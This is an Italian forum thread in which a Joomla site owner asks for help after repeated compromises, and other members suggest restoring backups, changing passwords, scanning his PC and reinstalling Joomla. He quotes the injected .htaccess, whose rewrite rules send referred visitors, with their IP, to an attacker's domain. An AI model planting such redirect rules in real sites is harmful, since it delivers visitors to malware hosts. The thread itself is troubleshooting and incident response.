Sito hackerato via ftp?

[nio84]

Ciao a tutti,
oggi mi hanno di nuovo bucato il sito dopo circa un mese, questa volta però è diverso.
Il mio sito in Joomla è sempre aggiornato.
Spiego un po cosa mi hanno fatto, pare che mi abbiamo inserito un file .htaccess in tutte le cartelle del sito joomla.
Per fare questo mi hanno bucato l'ftp, vero?

Ed ecco cosa mi appare con firefox:
"Segnalato sito malevolo
Il sito web yagizmo.com è stato segnalato come sito web malevolo ed è stato bloccato sulla base delle impostazioni di sicurezza correnti.
Un sito web malevolo cerca di installare dei software in grado di sottrarre le informazioni personali degli utenti, sfruttare il computer per attaccare altre macchine o semplicemente danneggiare il sistema.

Alcuni di questi siti distribuiscono intenzionalmente software dannoso, ma gran parte dei siti viene compromessa senza che il proprietario ne sia a conoscenza o ne sia responsabile."

infatti mi fa un redirect a questo sito: h t t p: // yagizmo . com/84.221.182.237

Devo preoccuparmi? Oppure metto dentro un backup, cambio le password di joomla, del ftp e del phpmysql, e cosi sono un po più tranquillo?
O pensate che dietro ad un attacco del genere c'è qualcosa di serio?

Grazie

[stefano.fenati]

sarebbe opportuno verificare anche se il software del server ftp è aggiornato

[nio84]

filezilla aggiornato

[stefano.fenati]

usi filezilla lato server?

[nio84]

no, lato client, lo uso io dal pc per uplodare.
Tu dici se il softwere ftp del server è aggiornato... come faccio a saperlo?

[stefano.fenati]

se ti hanno bucato via ftp, come credi, ci sono sue strade:

• hanno recuperato una password, magari non troppo complessa
• hanno sfruttato un baco del servizio ftp

Nel secondo caso puoi ricaricare il sito e  modificare le password tutte le volte che vuoi senza risolvere.
Comunque puoi fare come dici. carica il backup, cancellando prima il sito precedente.
cambia le password utilizzando credenzioali "strong"
guarda nei giorni successivi cosa succede.

[nio84]

Si grazie.
Sto facendo proprio cosi, vedo cosa succede questi giorni.

[mau_develop]

Per fare questo mi hanno bucato l'ftp, vero?
----------------------------------------------------------
tu non hai nessun ftp da bucare, a meno che il server non sia il tuo.

non ti è successo nulla di diverso dagli altri, cambia ciò che hanno fatto, ma il problema è sempre lo stesso:
qualcosa non è aggiornato

M

[nio84]

Ho capito, controllerò meglio. Anche se il mio sito e i suoi componeti sono aggiornati all'ultima versione.

Comunque, dal cPanel come faccio a cambiare la password del phpmysql, se si può fare?
Perchè ho cambiato quella dell'accesso all'ftp, ma non capisco come fare per mysql.
Grazie

[mau_develop]

probabilmente può farlo solo l'hoster.

se sei così sicuro di avere il sito aggiornato allora il problema può essere dell'hoster e quindi del server su cui risiedi, ma lui dai log lo vede, se poi non vuol perdere tempo per dirtelo è un'altro paio di maniche.
Se è un problema del server fai in fretta, cerchi con tool online tipo robtex quali sono i tuoi compagni di server e guardi in che stato sono i loro siti, almeno due o tre nelle tue stesse condizioni dovresti trovarli.

Un'altro problema, e se leggi il mio post in testa a qs sezione lo capisci, è la presenza di virus sul computer, da scansire molto approfonditamente, perchè non è difficile che sei tu stesso a "bucarti" (brutto vizio)

M.

[nio84]

Grazie
Faro sicuramente una scansione all'avvio del mio pc. Ho Avast! e Norton.
Come lo valuti avast? è buono? c'è di meglio free?

[mau_develop]

non esiste differenza tra un av free e uno a pagamento, la differenza sta unicamente nel servizio di "contorno" e in qualche tool.

esistono differenze di database impronte, e qualcuna sui metodi di test, quindi il ragionamento non deve essere se questo è meglio di quello, ma due av is mej che uan, se poi ne usi pure un terzo meglio ancora.

Le scansioni av andrebbero fatte senza avviare il s.o. ma l'unico che fa qs cosa è bitdefender live (free) e non funziona su tutti i pc, non so perchè.

Visto che qs è difficile è comunque necessario staccare dal pc tutto ciò che non sia mouse e tastiera e avviare in modalità provvisoria.
Quando si è sicuri che è a posto si iniziano ad attaccare le periferiche, nel caso di dischi scansione prima.
Ultima la rete.

M.

[nio84]

Oggi a distanza di pochi giorni mi hanno di nuovo modificato il sito.
Allora come l'altra volta mi hanno inserito in ogni cartella del file joomla un file .htaccess, ecco cosa c'è dentro questo file.

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . h t t p:// 84f6a4eef61784b33e4acbd32c8fdd72 . com/%{REMOTE_ADDR}

Io seguo tutte le procedure, ho cancellato tutto il sito e ripristinato con un backup sicuro. Cambio le password.
Qualcuno può avere un idea, c'è qualcosa che sbaglio? Perchè non so più cosa fare, non posso ogni 3 giorni uplodare il sito...
Aiutooo!!

[mau_develop]

c'è qualcosa che sbaglio?
--------------------------------------
sicuramente a giudicare sicuro qualcosa che non lo è.
Orimane la vulnerabilità su qualcosa o anche il backup contiene qualche schifezza, magari è un backup automatico (da buttare) o fatto quando già il problema esisteva.

M.

[nio84]

Non è un backup automatico, gli faccio sempre io.
E che non riesco a capire il problema... boo... ora provo a ripristinare un backup ancora più precedente e vediamo come si evolve la situazione.
La cosa che mi da più fastidio è che chi entra nel mio sito, prima che io mi accorga del problema pensa che è un sito malevolo, e quindi la mia immagine ne perde.
Comunqe grazie per la tua disponibilità

[nio84]

La mia ignoranza mi fa sorgere una domanda, c'è un comando che posso dare da filezilla per cancellare tutti i file .htaccess da tutte le cartelle?
Lo so che anche cosi non risolverei il problema ma mi farebbe stare tranquillo un oretta.

[mau_develop]

segui il procedimento che abbiamo usato quì, quasi sicuramente il tuo db è a posto.

http://forum.joomla.it/index.php/topic,122913.0.html

M.

[nio84]

Si avevo già pensato di fare cosi, perchè avevo gia letto i tuoi post.

Però ora che ci penso non ho spiegato bene cosa mi è successo.
Ho notato che tutte le cartelle presenti nel mio spazio, anche cartelle che non hanno niente a che fare con Joomla, come cartelle di immagini, e la cartella "admin" del phpmysql, hanno anche loro al loro interno questo file .htaccess aggiunto, tutti alla stessa ora 12:41:04 di oggi, quindi io posso escludere che il problema è Joomla, no?

Sto pensando che deriva tutto o da un virus prensente nel mio pc, oppure è l'host che non è sicuro.
Mi sbaglio?
Ho già mandato una mail a loro, vediamo cosa mi dicono.

[mau_develop]

mmhhh il fatto di avere una cartella di phpmyadmin tra quelle del tuo spazio web mi fa supporre che lo spazio web stia sullo stesso server del db... una situazione da disastro o dei capacissimi sysadmin....

cmq credo sei tu a fare quell'iniezione di codice con un virus.

M.

[nio84]

Ho scansionato all'avvio il mio pc, mi ha trovato solo una cosa questo: win32 killapp-w pup nella cartella c: hp\bin\ file infetto endprocess.exe
Può essere questo la causa?
Ma ho fatto una ricerca in internet mi dice che solo avast rileva questo virus e che dovrebbe essere un falso allarme.

[nio84]

Avevo deciso di stare a vedere come si evolveva la situazione, oggi era il database ad avere dei problemi, la home page mi dava errore 404, ripristinando il database tutto è ok.
Però la cosa più importante è cercare di capire se il problema deriva dal fatto che ripristino una versione di backup che ha già del codice malevolo, oppure c'è un problema di sicurezza con l'host.

Volevo fare delle domande, ma è normale che questo codice malevolo che ho all'interno del sito, possa un giorno, aggiungere a tutte le cartelle dello spazio web (quindi anche quelle non joom) un file .htaccess, mentre giorni dopo, modifica il database?
Dico, mi trovo di fronte a 2 differenti attacchi? O a un codice che crea più danni diversi?
Anche perchè posso spiegarmi se vengo attaccato da qualcuno che effettua un redirect su un sito malevolo, ma non capisco che utilità c'è nel rendere la home con errore 404. Che guadagno ne avrebbe un eventuale hacker?
C'è la possibilità che qualcuno voglia dare solo fastidio al sito? qualche concorrente o qualcosa del genere?

Vista la mia esperienza mi lascio come ultima chance quella di uplodare un joomla originale all'ultima release, e poi passo passo, inserire i miei file. Anche perchè ho poca esperienza...

[mau_develop]

mi lascio come ultima chance quella di uplodare un joomla originale all'ultima release, e poi passo passo, inserire i miei file.
------------------------------------------------------------------
io me la lascerei come prima, sempre e comunque, dopo il backup è il metodo + sicuro.

ma è normale che questo codice malevolo che ho all'interno del sito, possa un giorno, aggiungere a tutte le cartelle dello spazio web (quindi anche quelle non joom) un file .htaccess, mentre giorni dopo, modifica il database?
--------------------------------------------------------------------
se è scritto per fare quello è normalissimo. Pensa anche che se il tuo caso è quello del virus, ha costruito anche all'interno del tuo pc un "mini-server".
Il codice malevolo spesso è comunissimo codice che potrebbe anche essere usato come utilità,... ma così non viene usato.

Dico, mi trovo di fronte a 2 differenti attacchi? O a un codice che crea più danni diversi?
---------------------------------------------------------------------
dipende dal tipo di codice, se virus, malware, worm etc...
Nel web si usa semplificare ritenendolo comunque malware, tanto non ti frega nulla distinguere la specie, ai fini del danno da riparare, useresti sempre le stesse procedure.

Anche perchè posso spiegarmi se vengo attaccato da qualcuno che effettua un redirect su un sito malevolo, ma non capisco che utilità c'è nel rendere la home con errore 404. Che guadagno ne avrebbe un eventuale hacker?
----------------------------------------------------------------------------------------------
Dietro queste cose (e l'ho scritto nella guida), se non trovi elucubrazioni demenziali in homepage, ci sono quasi sempre darknet... bot.. non human...
Visto che si muove come uno spider ne farà a migliaia, i quali ne infettano altre migliaia, posso:
- Aumentare a dismisura il traffico verso qualcosa,
- Allargare la mia net coi pc infettati,
- Grabbare dati o dirigerli dove voglio io,

...ma nonostante tu stia a scervellarti sui perchè e percome non capirai mai quale era veramente lo scopo, perchè magari era banalissimo o legato ad altre "operazioni" o tu eri solamente un mezzo e non il fine.

cercare di capire se il problema deriva dal fatto che ripristino una versione di backup che ha già del codice malevolo,
--------------------------------------------------------------
se hai questo dubbio basta che fai un backup sql apri il file con notepad++ e pazientemente passi un paio di orette a spulciare anche velocemente le righe.
Non ti preoccupare che un codice strano salta subito all'occhio... tag ... numeri etc solitamente, tranne rari casi nel db non ci vanno, o se ci vanno ci vanno codificati e se sono codificati non si eseguono (...+ o -)

oppure c'è un problema di sicurezza con l'host.
----------------------------------------------------------------
anche questo non te lo diranno mai, però se mi mandi in pvt l'hosting o il link al sito, posso dirti qualcosa di più

M.

[nio84]

Grazie mille ora mi metto a lavoro